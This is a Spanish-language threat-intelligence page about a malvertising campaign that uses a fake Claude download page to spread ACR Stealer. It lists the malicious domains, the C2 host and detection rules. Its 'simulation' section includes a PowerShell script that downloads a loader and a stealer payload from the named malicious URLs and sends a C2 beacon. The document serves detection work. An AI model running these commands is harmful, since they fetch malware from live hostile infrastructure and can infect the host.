Una Página de Suplantación de Identidad de Claude Puede Distribuir ACR Stealer
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Investigadores de amenazas identificaron una campaña publicitaria maliciosa que redirige a los usuarios a una página de descarga falsa de Claude. El sitio entrega diferentes cargas útiles dependiendo del sistema operativo de la víctima, con la cadena de infección de Windows llevando al despliegue de ACRStealer. Los investigadores vincularon la actividad a múltiples dominios comprometidos y a un servidor de comando y control utilizado después de la infección. La campaña se basa en URL ofuscadas y un script de PowerShell para completar la entrega de la carga útil.
Investigación
El analista rastreó la actividad desde la página falsa inicial de Claude a través de varias URL redirigidas albergadas en diferentes dominios. Durante la cadena de infección, se descargaron un archivo ZIP, un script de PowerShell y una imagen JPEG, seguidos por comunicación HTTPS con un dominio de comando y control. El análisis de tráfico confirmó que el comportamiento de red posterior a la infección coincidió con la infraestructura asociada con la familia ACRStealer.
Mitigación
Las organizaciones deben bloquear los dominios y URL maliciosos identificados en el perímetro de la red. El tráfico publicitario debe ser filtrado para detectar anuncios maliciosos que refieran a la página falsa de Claude o cebos de suplantación similares. La protección de endpoints también debe configurarse para detectar comportamientos relacionados con ACRStealer y ejecuciones sospechosas de PowerShell.
Respuesta
Los defensores deben monitorear conexiones salientes al dominio de comando y control yw.enhanceblabber.cc y alertar sobre descargas del archivo ZIP y script de PowerShell identificados. Cualquier host que muestre actividad relacionada debe someterse a colección forense para posibles artefactos de ACRStealer y ser aislado si se confirma el compromiso.
Flujo de Ataque
Aún estamos actualizando esta parte. Regístrate para recibir notificaciones
NotifícameDetecciones
Comportamiento de Evasión de Defensa LOLBAS MSHTA Sospechoso mediante Detección de Comandos Asociados (via process_creation)
Ver
Comando y Control Sospechoso por Solicitud de DNS de Dominio de Nivel Superior (TLD) Inusual (via dns)
Ver
IOCs (HashSha256) para detectar: Posible ACR Stealer desde Página Suplantando a Claude
Ver
Detección de Distribución de ACR Stealer vía Páginas de Descarga Falsas de Claude [Conexión de Red de Windows]
Ver
Ejecución de Simulación
Requisito previo: Deben haber pasado el Chequeo Previo de Telemetría y Línea Base.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y buscan generar exactamente la telemetría esperada por la lógica de detección.
-
Narrativa y Comandos de Ataque:
- Cebo Inicial: El atacante envía un correo electrónico de phishing que contiene un enlace a
https://fairpoint29.com/. La víctima hace clic en el enlace, que carga una página de descarga falsa de Claude. - Ejecución de Descargador Malicioso: La página automáticamente desencadena una descarga desde
https://primemetricsa.com/1518925, entregando una carga útil disfrazada. - Recuperación de Carga Útil Secundaria: El stub descargado contacta a
https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42dpara obtener el binario completo de ACR Stealer. - Baliza de C2: Una vez ejecutado, el malware envía una baliza a
https://i.ibb.co/Xx16sbMz/init-block.jpg(una técnica que abusa del alojamiento de imágenes para C2 encubierta).
Cada paso genera una entrada de registro proxy que coincide con el
dominioandurlde los valores definidos en la regla Sigma, satisfaciendo así la condición de detección. - Cebo Inicial: El atacante envía un correo electrónico de phishing que contiene un enlace a
-
Script de Prueba de Regresión:
# ------------------------------------------------- # Simulación de Distribución de ACR Stealer – Regla de Activación # ------------------------------------------------- # Paso 1: Página de descarga falsa de Claude (GET inofensivo) Invoke-WebRequest -Uri "https://fairpoint29.com/" -UseBasicParsing | Out-Null # Paso 2: Binario del descargador (simulado por una descarga de archivo pequeño) Invoke-WebRequest -Uri "https://primemetricsa.com/1518925" -OutFile "$env:TEMPloader.bin" -UseBasicParsing # Paso 3: Recuperación completa de la carga útil Invoke-WebRequest -Uri "https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d" ` -OutFile "$env:TEMPacr_steler.bin" -UseBasicParsing # Paso 4: Baliza de C2 (POST de una imagen pequeña para disfrazar el tráfico) $body = [System.Text.Encoding]::UTF8.GetBytes("beacon") Invoke-WebRequest -Uri "https://i.ibb.co/Xx16sbMz/init-block.jpg" ` -Method Post -Body $body -ContentType "application/octet-stream" -UseBasicParsing | Out-Null # ------------------------------------------------- # Fin de la Simulación # ------------------------------------------------- -
Comandos de Limpieza:
# Eliminar artefactos descargados Remove-Item "$env:TEMPloader.bin" -ErrorAction SilentlyContinue Remove-Item "$env:TEMPacr_steler.bin" -ErrorAction SilentlyContinue # Vaciar la caché DNS para evitar entradas persistentes ipconfig /flushdns